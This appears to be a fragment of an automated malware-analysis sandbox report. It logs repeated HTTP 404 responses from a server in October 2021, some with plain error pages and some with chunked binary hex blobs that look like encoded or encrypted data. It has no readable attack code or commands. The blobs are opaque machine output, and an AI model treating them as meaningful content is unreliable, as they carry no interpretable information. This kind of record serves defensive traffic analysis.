d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 02 ed fd 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 44 40 40 07 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 40 22 b5 1b 6f d3 cb 29 32 86 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 5f a0 1f e4 a6 bd 12 9f 10 ff d9 b0 99 b5 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb d1 46 bb 2a d2 be 45 1f d0 b5 aa 7a 8f 0e 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b3 88 7d 3f dc e5 7e 3f a4 70 d4 03 bb 03 9a 76 6a 0f ca 82 c3 26 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 08 85 af 88 c1 a4 0e 31 25 4d db a9 c3 f8 cb 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc 86 d5 36 8c f6 c7 35 f3 73 07 03 d2 ff f9 fa fa eb b2 b9 71 cd 79 33 33 d1 60 73 45 7c 1f 57 44 63 84 be 3c 50 15 51 fe 08 a2 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed c5 70 b1 17 20 58 4a ed 08 63 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff e4 e1 55 db 8b 0d 13 13 bf 9e e1 92 08 0c 4f c5 03 a1 cb a1 61 7e de f5 69 e1 19 17 c6 4c af 9a a5 e4 c9 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 a3 77 2a b9 72 ce cc 23 b2 3b 0e 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 1f cd cc 46 d9 c8 15 ac af ed d9 55 3d ff ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 2a 64 b1 1d 32 12 51 8c 26 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e f6 11 11 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 cc 62 06 f1 60 7f ae 03 58 e5 1d e4 a4 7d 10 99 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:15 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 26 0b 04 59 b9 1d 6d f5 e9 e6 a1 29 7a 3a 62 c3 cc a7 43 ec 44 d7 6b 50 78 18 e0 30 8a 3c a2 61 a3 d6 d4 22 a2 58 d5 5b 2d 22 ad 88 88 5e 6f d7 9f b7 ee bc db 32 b9 9a 4c ca 4c 08 03 d4 d2 a1 97 c6 37 13 4b 42 c4 d4 5a c6 ca 23 e8 16 41 bf 6c 13 d9 c8 9f 57 db 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 88 b6 4b 24 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f eb 92 24 82 45 c5 03 49 bd a3 61 7e de f5 69 33 11 17 7e 4f af 9a a5 e4 c3 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 11 41 48 9a 07 fd ec 23 20 77 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 20 c6 4f 6b 79 82 ae 9c a7 82 4e 95 1f ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 75 6c e5 ee 30 4c 80 f0 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 9a 70 f7 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bb 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 39 07 bd 1b 6f d3 cb 29 32 a2 ed 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 13 61 6a e6 a6 dd 1a 9f 10 af d9 b0 99 89 93 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e1 33 17 28 d2 9e c6 1d d0 eb aa 7a 8f 52 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 75 82 71 d4 03 6b 2c 9a 76 48 0e ca 82 21 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc df 85 6e bb f6 c7 35 f3 73 07 03 d2 ff f9 da fb eb b2 b9 71 cd f5 34 33 d1 62 73 45 7c 1f 57 44 f3 08 b9 3c 50 15 51 fe 08 22 b1 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed 45 78 b1 17 20 58 4a ed 68 6a 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 5c 6d 52 db 93 0d 13 13 bf 1e e9 92 28 0e 4f c5 03 a1 cb a1 61 7e de f5 69 77 1e 17 c6 4c af 9a a5 64 c1 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 d3 fb 2d b9 72 ce cc 23 b2 b7 09 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 3f cf cc 46 d9 48 1d ac af e3 d9 55 3d 6b bd 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 aa 6c b1 1d 32 12 51 8c bc 10 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 46 9d 16 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 74 5d 01 f1 10 35 ae 03 58 e5 1f e4 ae 7d 10 99 80 e0 d9 b0 c1 1c 9e 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 